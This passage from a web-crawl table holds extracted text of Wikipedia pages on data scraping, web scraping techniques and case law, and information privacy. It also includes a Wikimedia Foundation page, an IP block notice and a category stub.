meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
679 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:RecentChanges | This is a list of recent changes to Wikipedia. |
680 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Web_Scraping_Platforms | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
681 | https://en.wikipedia.org/wiki/Data_scraping | https://hdl.handle.net/1822%2F32460 | Contacte-nos Estat sticas do Reposit riUM Universidade do Minho Copyright 2014 |
682 | https://en.wikipedia.org/wiki/Data_scraping | https://wikimediafoundation.org/ | The nonprofit Wikimedia Foundation provides the essential infrastructure for free knowledge. We host Wikipedia, the free online encyclopedia, created, edited, and verified by volunteers around the world, as well as many other vital community projects. All of which is made possible thanks to donations from individuals like you. We welcome anyone who shares our vision to join us in collecting and sharing knowledge that fully represents human diversity. Protect and sustain Wikipedia Donations are secure 1 You made it. It is yours to use. For free. That means you can use it, adapt it, or share what you find on Wikimedia sites. Just do not write your own bio, or copy paste it into your homework. 2 We do not sell your email address or any of your personal information to third parties. More information about our privacy practices are available at the Wikimedia Foundation privacy policy, donor privacy policy, and data retention guidelines. 3 Readers verify the facts. Articles are collaboratively created and edited by a community of volunteers using reliable sources, so no single person or company owns a Wikipedia article. The Wikimedia Foundation does not write or edit, but you and everyone you know can help. 4 The word “wiki” refers to a website built using collaborative editing software. Projects with no past or existing affiliation with Wikipedia or the Wikimedia Foundation, such as Wikileaks and wikiHow, also use the term. Although these sites also use “wiki” in their name, they have nothing to do with Wikimedia. 280,000 editors contribute to Wikimedia projects every month 100 million media files on Wikimedia Commons and counting 1.5 billion unique devices access Wikimedia projects every month We conduct our own research and partner with researchers worldwide to address change in society and technology. From site reliability to machine learning, our open-source technology makes Wikipedia faster, more reliable, and more accessible worldwide. We fight to protect everyone’s right to access free and open knowledge. Our volunteers build tools, share photos, write articles, and are working to connect all the knowledge that exists. Free encyclopedia written in over 300 languages by volunteers around the world. The world’s largest free-to-use-library of illustrations, photos, drawings, videos and music. The nineteenth edition of the global event will take place in Katowice, Poland (the 2024 European City of Science), from 7 10 August. The Foundation supports challenges to laws in Texas and Florida that jeopardize Wikipedia’s community-led governance model and the right to freedom of expression. Throughout history, knowledge has been controlled by a powerful few. Wikipedia needs knowledge from all languages and cultures. The internet has become the default for accessing information—women, people of color, and the global south remain underrepresented. We invite you to help correct history. As a nonprofit, Wikipedia and our related free knowledge projects are powered primarily through donations. Wikimania Katowice 2024 Bird Header Wikimedia Foundation CC BY-SA 4.0 US Supreme Court File provided by Wikimedia Commons Jarek Tuszy ski CC BY-SA 3.0 Armine Aghayan File provided by Wikimedia Commons Victor Grigas CC BY-SA 3.0 Vitor Mazuco File provided by Wikimedia Commons Matthew (WMF) CC BY-SA 3.0 Sam Oye - Wiki Indaba 2017 File provided by Wikimedia Commons Zachary McCune Wikimedia Foundation CC BY-SA 4.0 Knowledge Is Human Homepage Animated Banner File provided by Wikimedia Commons Hannah Jacobs for the Wikimedia Foundation CC0 1.0 Wikimedia Conference 2017 File provided by Wikimedia Commons Jason Kr ger Wikimedia Deutschland e.V. CC BY-SA 4.0 Papaul Tshibamba 3 File provided by Wikimedia Commons Victor Grigas CC BY SA 3.0 SOPA protest in Midtown NYC File provided by Wikimedia Commons Zachary McCune CC BY-SA 4.0 Wikipedia logo File provided by Wikimedia Commons Nohat; Paullusmagnus; Wikimedia CC-BY-SA 3.0 Wikimedia Commons logo File provided by Wikimedia Commons Reidab; User:Grunt; 3247 Public domain Art Feminism Wikipedia edit-a-thon File provided by Wikimedia Commons Jens Mohr CC BY-SA 3.0 The Wikimedia Foundation, Inc is a nonprofit charitable organization dedicated to encouraging the growth, development and distribution of free, multilingual content, and to providing the full content of these wiki-based projects to the public free of charge. |
683 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_privacy | Information privacy is the relationship between the collection and dissemination of data, technology, the public expectation of privacy, contextual information norms, and the legal and political issues surrounding them. 1 It is also known as data privacy 2 or data protection. Various types of personal information often come under privacy concerns. This describes the ability to control what information one reveals about oneself over cable television, and who can access that information. For example, third parties can track IP TV programs someone has watched at any given time. "The addition of any information in a broadcasting stream is not required for an audience rating survey, additional devices are not requested to be installed in the houses of viewers or listeners, and without the necessity of their cooperations, audience ratings can be automatically performed in real-time. 3 In the United Kingdom in 2012, the Education Secretary Michael Gove described the National Pupil Database as a "rich dataset" whose value could be "maximised" by making it more openly accessible, including to private companies. Kelly Fiveash of The Register said that this could mean "a child's school life including exam results, attendance, teacher assessments and even characteristics" could be available, with third-party organizations being responsible for anonymizing any publications themselves, rather than the data being anonymized by the government before being handed over. An example of a data request that Gove indicated had been rejected in the past, but might be possible under an improved version of privacy regulations, was for "analysis on sexual exploitation". 4 Information about a person's financial transactions, including the amount of assets, positions held in stocks or funds, outstanding debts, and purchases can be sensitive. If criminals gain access to information such as a person's accounts or credit card numbers, that person could become the victim of fraud or identity theft. Information about a person's purchases can reveal a great deal about that person's history, such as places they have visited, whom they have contact with, products they have used, their activities and habits, or medications they have used. In some cases, corporations may use this information to target individuals with marketing customized towards those individual's personal preferences, which that person may or may not approve. 4 As heterogeneous information systems with differing privacy rules are interconnected and information is shared, policy appliances will be required to reconcile, enforce, and monitor an increasing amount of privacy policy rules (and laws). There are two categories of technology to address privacy protection in commercial IT systems: communication and enforcement. Computer privacy can be improved through individualization. Currently security messages are designed for the "average user", i.e. the same message for everyone. Researchers have posited that individualized messages and security "nudges", crafted based on users' individual differences and personality traits, can be used for further improvements for each person's compliance with computer security and privacy. 5 The ability to control the information one reveals about oneself over the internet and who can access that information has become a growing concern. These concerns include whether email can be stored or read by third parties without consent or whether third parties can continue to track the websites that someone visited. Another concern is whether websites one visits can collect, store, and possibly share personally identifiable information about users. The advent of various search engines and the use of data mining created a capability for data about individuals to be collected and combined from a wide variety of sources very easily. 6 7 8 AI facilitated creating inferential information about individuals and groups based on such enormous amounts of collected data, transforming the information economy. 9 The FTC has provided a set of guidelines that represent widely accepted concepts concerning fair information practices in an electronic marketplace, called the Fair Information Practice Principles. But these have been critiqued for their insufficiency in the context of AI-enabled inferential information. 10 On the internet many users give away a lot of information about themselves: unencrypted e-mails can be read by the administrators of an e-mail server if the connection is not encrypted (no HTTPS), and also the internet service provider and other parties sniffing the network traffic of that connection are able to know the contents. The same applies to any kind of traffic generated on the Internet, including web browsing, instant messaging, and others. In order not to give away too much personal information, e-mails can be encrypted and browsing of webpages as well as other online activities can be done traceless via anonymizers, or by open source distributed anonymizers, so-called mix networks. Well-known open-source mix nets include I2P The Anonymous Network and Tor. 11 Email is not the only internet content with privacy concerns. In an age where increasing amounts of information are online, social networking sites pose additional privacy challenges. People may be tagged in photos or have valuable information exposed about themselves either by choice or unexpectedly by others, referred to as participatory surveillance. Data about location can also be accidentally published, for example, when someone posts a picture with a store as a background. Caution should be exercised when posting information online. Social networks vary in what they allow users to make private and what remains publicly accessible. 12 Without strong security settings in place and careful attention to what remains public, a person can be profiled by searching for and collecting disparate pieces of information, leading to cases of cyberstalking 13 or reputation damage. 14 Cookies are used on websites so that users may allow the website to retrieve some information from the user's internet, but they usually do not mention what the data being retrieved is. 15 In 2018, the General Data Protection Regulation (GDPR) passed a regulation that forces websites to visibly disclose to consumers their information privacy practices, referred to as cookie notices. 15 This was issued to give consumers the choice of what information about their behavior they consent to letting websites track; however, its effectiveness is controversial. 15 Some websites may engage in deceptive practices such as placing cookie notices in places on the page that are not visible or only giving consumers notice that their information is being tracked but not allowing them to change their privacy settings. 15 Apps like Instagram and Facebook collect user data for a personalized app experience; however, they track user activity on other apps, which jeopardizes users' privacy and data. By controlling how visible these cookie notices are, companies can discreetly collect data, giving them more power over consumers. 15 As location tracking capabilities of mobile devices are advancing (location-based services), problems related to user privacy arise. Location data is among the most sensitive data currently being collected. 16 A list of potentially sensitive professional and personal information that could be inferred about an individual knowing only their mobility trace was published in 2009 by the Electronic Frontier Foundation. 17 These include the movements of a competitor sales force, attendance of a particular church or an individual's presence in a motel, or at an abortion clinic. A recent MIT study 18 19 by de Montjoye et al. showed that four spatio-temporal points, approximate places and times, are enough to uniquely identify 95% of 1.5 million people in a mobility database. The study further shows that these constraints hold even when the resolution of the dataset is low. Therefore, even coarse or blurred datasets provide little anonymity. People may not wish for their medical records to be revealed to others due to the confidentiality and sensitivity of what the information could reveal about their health. For example, they might be concerned that it might affect their insurance coverage or employment. Or, it may be because they would not wish for others to know about any medical or psychological conditions or treatments that would bring embarrassment upon themselves. Revealing medical data could also reveal other details about one's personal life. 20 There are three major categories of medical privacy: informational (the degree of control over personal information), physical (the degree of physical inaccessibility to others), and psychological (the extent to which the doctor respects patients' cultural beliefs, inner thoughts, values, feelings, and religious practices and allows them to make personal decisions). 21 Physicians and psychiatrists in many cultures and countries have standards for doctor patient relationships, which include maintaining confidentiality. In some cases, the physician patient privilege is legally protected. These practices are in place to protect the dignity of patients, and to ensure that patients feel free to reveal complete and accurate information required for them to receive the correct treatment. 22 To view the United States' laws on governing privacy of private health information, see HIPAA and the HITECH Act. The Australian law is the Privacy Act 1988 Australia as well as state-based health records legislation. Political privacy has been a concern since voting systems emerged in ancient times. The secret ballot is the simplest and most widespread measure to ensure that political views are not known to anyone other than the voters themselves—it is nearly universal in modern democracy and considered to be a basic right of citizenship. In fact, even where other rights of privacy do not exist, this type of privacy very often does. There are several forms of voting fraud or privacy violations possible with the use of digital voting machines. 23 The legal protection of the right to privacy in general and of data privacy in particular varies greatly around the world. 24 Laws and regulations related to Privacy and Data Protection are constantly changing, it is seen as important to keep abreast of any changes in the law and to continually reassess compliance with data privacy and security regulations. 25 Within academia, Institutional Review Boards function to assure that adequate measures are taken to ensure both the privacy and confidentiality of human subjects in research. 26 Privacy concerns exist wherever personally identifiable information or other sensitive information is collected, stored, used, and finally destroyed or deleted in digital form or otherwise. Improper or non-existent disclosure control can be the root cause for privacy issues. Informed consent mechanisms including dynamic consent are important in communicating to data subjects the different uses of their personally identifiable information. Data privacy issues may arise in response to information from a wide range of sources, such as: 27 The United States Department of Commerce created the International Safe Harbor Privacy Principles certification program in response to the 1995 Directive on Data Protection (Directive 95 46 EC) of the European Commission. 31 Both the United States and the European Union officially state that they are committed to upholding information privacy of individuals, but the former has caused friction between the two by failing to meet the standards of the EU's stricter laws on personal data. The negotiation of the Safe Harbor program was, in part, to address this long-running issue. 32 Directive 95 46 EC declares in Chapter IV Article 25 that personal data may only be transferred from the countries in the European Economic Area to countries which provide adequate privacy protection. Historically, establishing adequacy required the creation of national laws broadly equivalent to those implemented by Directive 95 46 EU. Although there are exceptions to this blanket prohibition for example where the disclosure to a country outside the EEA is made with the consent of the relevant individual (Article 26(1)(a)) they are limited in practical scope. As a result, Article 25 created a legal risk to organizations which transfer personal data from Europe to the United States. The program regulates the exchange of passenger name record information between the EU and the US. According to the EU directive, personal data may only be transferred to third countries if that country provides an adequate level of protection. Some exceptions to this rule are provided, for instance when the controller themself can guarantee that the recipient will comply with the data protection rules. The European Commission has set up the "Working party on the Protection of Individuals with regard to the Processing of Personal Data, commonly known as the "Article 29 Working Party". The Working Party gives advice about the level of protection in the European Union and third countries. 33 The Working Party negotiated with U.S. representatives about the protection of personal data, the Safe Harbor Principles were the result. Notwithstanding that approval, the self-assessment approach of the Safe Harbor remains controversial with a number of European privacy regulators and commentators. 34 The Safe Harbor program addresses this issue in the following way: rather than a blanket law imposed on all organizations in the United States, a voluntary program is enforced by the Federal Trade Commission. U.S. organizations which register with this program, having self-assessed their compliance with a number of standards, are "deemed adequate" for the purposes of Article 25. Personal information can be sent to such organizations from the EEA without the sender being in breach of Article 25 or its EU national equivalents. The Safe Harbor was approved as providing adequate protection for personal data, for the purposes of Article 25(6), by the European Commission on 26 July 2000. 35 Under the Safe Harbor, adoptee organizations need to carefully consider their compliance with the onward transfer obligations, where personal data originating in the EU is transferred to the US Safe Harbor, and then onward to a third country. The alternative compliance approach of "binding corporate rules", recommended by many EU privacy regulators, resolves this issue. In addition, any dispute arising in relation to the transfer of HR data to the US Safe Harbor must be heard by a panel of EU privacy regulators. 36 In July 2007, a new, controversial, 37 Passenger Name Record agreement between the US and the EU was made. 38 A short time afterwards, the Bush administration gave exemption for the Department of Homeland Security, for the Arrival and Departure Information System (ADIS) and for the Automated Target System from the 1974 Privacy Act. 39 In February 2008, Jonathan Faull, the head of the EU's Commission of Home Affairs, complained about the US bilateral policy concerning PNR. 40 The US had signed in February 2008 a memorandum of understanding (MOU) with the Czech Republic in exchange of a visa waiver scheme, without concerting before with Brussels. 37 The tensions between Washington and Brussels are mainly caused by a lesser level of data protection in the US, especially since foreigners do not benefit from the US Privacy Act of 1974. Other countries approached for bilateral MOU included the United Kingdom, Estonia, Germany and Greece. 41 |
684 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping | The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
685 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_Danish-language_sources_(da) | This is a tracking category for CS1 citations that use the parameter language da to identify a source in Danish. Pages in this category should only be added by CS1 templates and Module:Citation CS1. The following 200 pages are in this category, out of approximately 17,294 total. This list may not reflect recent changes. The following 3 files are in this category, out of 3 total. |
